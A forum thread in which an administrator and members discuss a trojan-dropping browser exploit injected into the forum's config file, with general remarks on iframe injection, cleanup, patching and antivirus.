Hacking / Trojan Attempts on the MLW Forums

[Greg]

Thanks for all the emails and the notifications about the trojan virus that was appearing in these forums. Somehow a hacker was able to modify a config file for the forum software and insert a rather nasty browser exploit that attempted to download and install a trojan into anyone using IE. How the hacker was able to do this is stil a mystery, however all FTP, and forum admin passwords have been changed and the file permissions (on the server) have been reviewed and updated.

I spent all today reinstalling and reconfiguring the forums, and it looks like no real damage was done.

I apoligize for the downtime - I accidently deleted the thread that included some instuctions on how to remove the trojan, however (I was infected too!), almost any reputable anti-virus software package should remove it. I'm using Trend Mirco, and it removed the viruses easily.

Trend Micro has a free virus checker/remover here: http://www.trendmicro.com/hc_intro/default.asp

Again, sorry about the problems, I will investigate this incident further and report back if I find out anything more.

[theloniusfleabag]

Dear Greg,

Seems that this malady is common...

http://www.churchofcriticalthinking.com/fo...t=0entry10784

from the administrator..

Everything is chmod'd properly. I've doublechecked. As far as I can tell the exploits have to do with vulnerabilities in the Bulletin Board software that make the board wrapper editable without being the Administrator. So someone can insert a line in the board wrapper that inserts an image or other code. They are usually within an iframe tag. Removing it is a headache, but as simple as finding the iframe tag and removing the contents.

There seems to be another similar exploit that does basically the same thing but tries to hide it by setting up a board macro, and then just inserting a call to that macro in the board wrapper. So there's no iframe tag. But in its place is an odd macro. Also easily identifiable and removable.

There's one more exploit that replaces/inserts key lines in the board's conf file. I've confirmed it's chmod'd properly, but it's still vulnerable. I keep a backup copy of the conf file so when this gets attacked I just replace it with the backup.

So far, that's what I've been up against. Oh, and there was the one attack that ended up removing all but one forum, and lumping all the conversations together. I have no idea how that was done, but I don't know what I can do about it.

Well done, though, and thanks for your efforts!

[Greg]

There's one more exploit that replaces/inserts key lines in the board's conf file.

This is exactly what happend, but it took almost all day to figure it out. I was examining so many lines of code iin the templates that my eyes were going cross-eyed and then I finally looked in the config file and found the problem.

However, I've completely reinstalled the forum and confirmed the file permissions, just to be on the safe side.

Thanks for doing some research, you can never have enough ideas being tossed around.

Cheers!

[GostHacked]

It is a Windows exploit, if any of you have the auto updates on then you would be ok.

Do your MS Windows updates.

Update your AV and spyware software.

Scan scan scan.

http://www.microsoft.com/technet/security/...ory/912840.mspx

http://www.microsoft.com/technet/security/...n/ms06-001.mspx

I was really f**ckin surprised when our lan team did not catch this. Not surprised that they have not done the updates recently. I notified my managers of the virus. Update your Windows and this should not happen again to your system. Well, I was sad I could not surf to here today, untill now, and that makes me happy. Good job Greg.

[Montgomery Burns]

So that's why I couldn't get in here a few days back. A file kept on getting loaded and then it would "kill" my window.